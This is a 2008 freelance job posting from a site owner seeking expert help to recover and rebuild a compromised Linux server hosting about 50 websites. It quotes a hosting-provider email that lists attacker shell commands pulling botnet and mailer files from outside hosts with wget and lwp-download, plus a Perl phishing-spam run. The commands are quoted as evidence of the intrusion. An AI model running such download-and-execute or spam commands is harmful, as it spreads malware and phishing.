Project Detail

Description

OK...I have a self managed Fasthosts Linux server that has been compromised badly!

I have over 50 web sites on it and data and I really need some expert help to get the server back on track. SSH is available and I think that is all! None of the web sites seem to be responding but I am unsure if the sites have been deleted or it is a server problem!

I cannot stress that I need a real expert that understands Linux, Mysql, phpmyadmin etc......please do not try for this job if you THINK you can do it...I NEED AN EXPERT...A GOOD EXPERT.

Below is the email from Fasthosts regarding the problems!

If you can help please get in touch......Thanks...Paul

EMAIL
Thank you for getting back to us. I can confirm that the passwords we provided are correct, and SSH is accessible using them. Unfortunately, the Matrix CP is not going to work, as most of it is completely missing. It would usually reside in the /opt folder, but this is not present. Also, whilst looking through the command history to see why this happened, I have found several suspicious looking commands. Examples of this are:

lwp-download http://noden.110mb.com/botnet.txt
wget http://www.fb1.just-ribbit.com/lo0ol.php
lwp-download http://www.proxysxavast.xpg.com.br/email.txt
perl email.txt hehe.txt "" "Cartao com Carinho Para Voce" engTIM.html

There are lots more. It appears to me that the server has been compromised, and I must ask you to rebuild it as soon as is possible. There is no telling how far the attackers has got their claws in to the server, and also no telling whether they have removed pertinent logfiles relating to it. They have had root access, so they have not been limited at all. - EMAIL ENDS


Additional information submitted:

01/14/2008 at 8:52 EST:
Also I will want all of the sites and databases (DB's are only small) taking from the server, the server rebuilding which is a function provided by Fasthosts server management area and then all of the sites reinstating along with the databases and phpmyadmin to manage them etc....basically save my sites and databases perform a server rebuild and reinstate on a rebuilt clean server.